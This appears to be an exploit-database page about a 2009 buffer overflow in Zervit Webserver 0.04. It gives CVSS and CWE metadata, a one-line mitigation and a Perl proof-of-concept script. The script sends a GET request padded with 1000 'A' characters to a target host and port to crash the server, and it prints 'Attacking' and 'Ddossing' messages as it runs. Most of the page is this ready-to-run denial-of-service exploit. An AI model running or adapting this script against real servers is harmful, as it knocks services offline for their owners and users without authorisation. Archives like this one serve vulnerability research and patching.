header-logo
Suggest Exploit
vendor:
Zervit Webserver
by:
Stack
7,5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Zervit Webserver
Affected Version From: 0.04
Affected Version To: 0.04
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Zervit Webserver 0.04 Bof Poc

This exploit is a proof of concept for a buffer overflow vulnerability in Zervit webserver 0.04. It sends a request with a large number of 'A' characters to the target server, which causes the server to crash.

Mitigation:

Upgrade to the latest version of Zervit webserver.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Zervit webserver 0.4 Bof Poc
# make it just for fun :s
use LWP::Simple;
use LWP::UserAgent;
 
if (@ARGV < 2) {
            print("Usage: $0 <url> <port>\n");
            print("TARGETS are\n ");
            print("Example: perl $0 127.0.0.1 777 \n");
            exit(1);
                    }
                    ($target, $port) = @ARGV;
        print("Zervit Webserver 0.04 bof xpl : Coded by Stack!\n");
        print("Attacking $target on port $port!\n");
        print("Ddossing .......\n");
        $dos ="\x41" x 1000 ;
        $temp="/" x 2;
         my $url= "http://". $target. ":" . $port .$temp . $dos;
            $content=get $url;
            print("\n Server Bofed");

# milw0rm.com [2009-05-18]